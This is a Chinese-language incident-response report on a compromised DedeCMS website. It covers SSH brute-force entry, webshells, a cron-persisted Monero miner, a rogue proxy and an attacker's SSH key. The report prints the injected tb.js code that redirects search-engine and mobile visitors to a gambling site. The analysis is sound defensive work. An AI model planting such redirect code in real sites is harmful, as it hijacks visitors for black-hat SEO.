網(wǎng)站源碼被篡改,攻擊者一定獲取到了權(quán)限,那么接下來(lái)的思路就是推測(cè)攻擊者入侵手段,找到業(yè)務(wù)脆弱點(diǎn),對(duì)服務(wù)器進(jìn)行全方位排查,找到攻擊者留下來(lái)的痕跡并進(jìn)行分析處理。
0x01 事件背景
8月某日,客戶官網(wǎng)被黑,需在特定時(shí)間內(nèi)完成整改。為避免客戶業(yè)務(wù)受到影響,實(shí)驗(yàn)室相關(guān)人員第一時(shí)間展開本次攻擊事件的應(yīng)急處理。
0x02 事件分析
網(wǎng)站源碼被篡改,攻擊者一定獲取到了權(quán)限,那么接下來(lái)的思路就是推測(cè)攻擊者入侵手段,找到業(yè)務(wù)脆弱點(diǎn),對(duì)服務(wù)器進(jìn)行全方位排查,找到攻擊者留下來(lái)的痕跡并進(jìn)行分析處理。
2.1 信息收集
與客戶簡(jiǎn)單溝通后,得知如下基本信息:
- 官網(wǎng)服務(wù)器為租賃的阿里云虛擬專用服務(wù)器
- 虛擬專用服務(wù)器上部署的官網(wǎng)后臺(tái)使用了DedeCMS織夢(mèng)系統(tǒng)
- 虛擬專用服務(wù)器安裝了寶塔面板服務(wù)器運(yùn)維系統(tǒng)
- 虛擬專用服務(wù)器安裝的寶塔面板的密碼已被篡改
2.2 攻擊入口判斷
服務(wù)器開放了SSH、寶塔、DedeCMS等3個(gè)服務(wù),那么接下來(lái)我們從服務(wù)器開放的服務(wù)來(lái)推測(cè)可能的攻擊入口。
玩過(guò)寶塔的朋友都知道,寶塔后臺(tái)路徑未知的情況下,通過(guò)寶塔后臺(tái)GetShell基本上是不可能的。此外,客戶設(shè)置的BT面板的用戶名也有些復(fù)雜,所以推斷攻擊者從寶塔下手的可能性很小(這里埋個(gè)坑,前面提到客戶寶塔后臺(tái)密碼被修改的情況,后面會(huì)說(shuō)到原因)。
客戶官網(wǎng)使用的DedeCMS版本為 v5.7 sp2,嘗試所有公開漏洞均未成功。并且,DedeCMS的后臺(tái)密碼沒(méi)有規(guī)律,所以推測(cè)從DedeCMS入侵的可能性也不是很大。
客戶給出了服務(wù)器的賬號(hào)密碼,我們的第一反應(yīng)是入侵從SSH弱口令開始的。因?yàn)槲业谋谱值淅锇朔?wù)器的密碼(手動(dòng)笑哭),但這顯然還不能直接讓客戶信服。
綜上,高度懷疑服務(wù)器是被爆破SSH弱口令后導(dǎo)致了后續(xù)的入侵行為。
2.3 應(yīng)急響應(yīng)
在判斷攻擊入口后,我們登錄客戶的服務(wù)器,仔細(xì)掄了一遍,只能說(shuō)服務(wù)器上的東西有點(diǎn)多。。。
2.3.1 BC黑頁(yè)&php后門
首先訪問(wèn)客戶首頁(yè),發(fā)現(xiàn)官網(wǎng)頁(yè)面表面沒(méi)有任何異常,也并未被重定向到BC網(wǎng)站。但是實(shí)際上網(wǎng)頁(yè)Meta信息被篡改,且會(huì)異步請(qǐng)求BC網(wǎng)站和百度統(tǒng)計(jì)的若干接口。
推測(cè)攻擊者的目的應(yīng)為BC網(wǎng)站seo優(yōu)化,提高網(wǎng)站的SEO排名。
定位到服務(wù)器上的DedeCMS網(wǎng)站源碼,發(fā)現(xiàn)源碼在7月17日被修改植入了惡意代碼。
網(wǎng)站源碼被插入2個(gè)新的meta元素,以及一段JAVAScript代碼。下圖為新增的meta元素,解碼后發(fā)現(xiàn)是菠菜搜索關(guān)鍵詞。
新插入的JavaScript代碼如下圖所示。解碼后發(fā)現(xiàn)是一段引用外部js的代碼。
惡意js文件的內(nèi)容為:
此文件的作用就是插入https://sjbgw2022.com/tb.js的惡意文件以及對(duì)惡意SEO優(yōu)化。
繼續(xù)查看tb.js這個(gè)文件內(nèi)容:
//這里省略一大段代碼,因?yàn)榇a內(nèi)容與ly.js內(nèi)容一致都是對(duì)惡意SEO的優(yōu)化
//上面的代碼與之前一樣作用就是推送自動(dòng)收錄。
//JS正則表達(dá)式判斷來(lái)路,如果是下列搜索引擎則指定跳轉(zhuǎn)網(wǎng)址。
var regexp=/.(sogou|soso|baidu|bsb|youdao|lanjie|bing|118114|biso|sm|qq|so|safe|toutiao|biso|360)(.[a-z0-9-]+){1,2}//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="https://tb04.cc/";//滿足就跳轉(zhuǎn)至菠菜頁(yè)面。
}
//更詳細(xì)的檢測(cè),判斷是否包含搜索引擎字段,是則跳轉(zhuǎn)至菠菜頁(yè)面。
var sp_regexps =
/.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)./gi;
var sp_whereis = window.location.referrer;
try {
sp_whereis = top.document.referrer;
} catch (e) {}
try {
sp_whereis = window.parent.document.referrer;
} catch (e) {}
var sp_domains = window.location.host;
try {
sp_domains = top.document.domain;
} catch (e) {}
try {
sp_domains = window.parent.document.domain;
} catch (e) {}
if (sp_regexps.test(sp_whereis)) {
window.location.href = 'https://tb04.cc';
parent.window.opener.location = 'https://tb04.cc';
}
//判斷是否是移動(dòng)端,滿足也跳轉(zhuǎn)至菠菜頁(yè)面。
function browserRedirect() {
var sUserAgent = navigator.userAgent.toLowerCase();
var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';
var bIsiphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';
var bIsMidp = sUserAgent.match(/midp/i) == 'midp';
var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';
var bIsAndroid = sUserAgent.match(/android/i) == 'android';
var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';
var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';
if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {
} else {
window.location.href = 'https://tb04.cc';
}
}
browserRedirect();
發(fā)現(xiàn)這個(gè)文件的作用是惡意SEO優(yōu)化,判斷訪問(wèn)網(wǎng)站的來(lái)路,如果是從搜索引擎過(guò)來(lái)的就會(huì)跳轉(zhuǎn)至菠菜頁(yè)面,如果是直接訪問(wèn)官網(wǎng)則不會(huì)有變化。菠菜頁(yè)面截圖如下所示:
此外,在DedeCMS源碼目錄發(fā)現(xiàn)了很多PHP后門。
2.3.2 寶塔淪陷
接下來(lái)我們進(jìn)行了日志排查,發(fā)現(xiàn)系統(tǒng)日志都已經(jīng)被清理。
前面說(shuō)到寶塔密碼已被修改,那么為了登入寶塔,我們直接修改寶塔密碼。在服務(wù)器上輸入bt命令進(jìn)行修改。
登入寶塔后臺(tái)后,我們發(fā)現(xiàn)最后一次登錄時(shí)間為7月16日,攻擊者上傳了一個(gè)名為zxc.php的木馬文件。
網(wǎng)站日志未被刪除,日志顯示攻擊者在7月17日通過(guò)zxc.php上傳大量后門文件,下圖為日志訪問(wèn)記錄截圖。
下圖為一個(gè)PHP大馬的截圖。
綜上所述,推斷攻擊者是菠菜SEO黑產(chǎn)組織,攻擊手法為利用SSH弱口令遠(yuǎn)程登錄服務(wù)器,修改寶塔后臺(tái)密碼后上傳木馬,進(jìn)而通過(guò)代理機(jī)器繼續(xù)上傳其它木馬文件。這是2.2節(jié)中所述的寶塔密碼被篡改的原因。
2.3.3 門羅幣挖礦木馬
服務(wù)器上的問(wèn)題還不僅僅是被掛黑頁(yè)這么簡(jiǎn)單。服務(wù)器進(jìn)程排查過(guò)程中發(fā)現(xiàn),某進(jìn)程CPU占用率特別高,不出意外就是挖礦程序了。
跟蹤定位文件位置為/root/.warmup/。
發(fā)現(xiàn)挖礦配置文件/root/.warmup/config.json。
從網(wǎng)絡(luò)通聯(lián)信息發(fā)現(xiàn)礦池地址為5.133.65.53至5.133.65.56的IP段。威脅情報(bào)表明這是一個(gè)門羅幣礦池。
殺死挖礦進(jìn)程后程序自啟動(dòng),刪除挖礦文件后發(fā)現(xiàn)過(guò)一段時(shí)間文件會(huì)被重新下載并運(yùn)行。這說(shuō)明存在挖礦守護(hù)進(jìn)程或定時(shí)任務(wù)。經(jīng)分析,發(fā)現(xiàn)一個(gè)5月7日就創(chuàng)建的定時(shí)挖礦任務(wù)。
somescript文件內(nèi)容為創(chuàng)建一個(gè)挖礦自啟動(dòng)服務(wù)warmup,保證進(jìn)程或文件被刪除后能重新加載挖礦程序。
2.3.4 xray代理
Xray是V2ray的一個(gè)分支(Fork)。Xray項(xiàng)目基于V2ray而來(lái),其支持并且兼容V2ray的配置,其官方網(wǎng)站為(https://xtls.github.io/Xray-docs-next/),我們?cè)谶M(jìn)程排查中發(fā)現(xiàn)有Xray程序正在運(yùn)行。
Xray最后一次運(yùn)行時(shí)間為8月17日。
2.3.5 SSH后門
最后,除了后門、定時(shí)任務(wù)外,繼續(xù)查看服務(wù)器上是否有攻擊者留下的手段。我們發(fā)現(xiàn)服務(wù)器在5月9日被寫入SSH公鑰,經(jīng)與客戶確認(rèn)不是客戶所為。
0x03 應(yīng)急處理
客戶有業(yè)務(wù)數(shù)據(jù)備份,那么處理和加固就簡(jiǎn)單多了。我們對(duì)服務(wù)器進(jìn)行了如下操作:
- 重置系統(tǒng)服務(wù)器
- 修改服務(wù)器、系統(tǒng)后臺(tái)的口令,加強(qiáng)口令復(fù)雜度,避免出現(xiàn)連續(xù)性口令
- 自定義日志目錄,避免日志被刪除
- 網(wǎng)站目錄設(shè)置除root外所有用戶禁止寫入
- 上傳目錄做權(quán)限設(shè)置
0x04 事件還原與總結(jié)
我們推測(cè)攻擊者不止一個(gè),并且都是通過(guò)SSH弱口令入侵服務(wù)器。事件時(shí)間線如下圖所示:
第一波攻擊者可能是挖礦組織,在5月7日大概率利用SSH弱口令進(jìn)入服務(wù)器上傳挖礦程序somescript,且做了對(duì)應(yīng)的維持手段。
第二波攻擊者可能是黑產(chǎn)組織,攻擊時(shí)間為7月16日至7月17日,其操作是對(duì)網(wǎng)站做黑帽SEO,更改寶塔后臺(tái)并上傳大量后門。
第三波攻擊者應(yīng)該只是想控制一批跳板機(jī),在8月17日上傳了代理程序,目前在服務(wù)器上出現(xiàn)的惡意事件最后截止也是到8月17日。
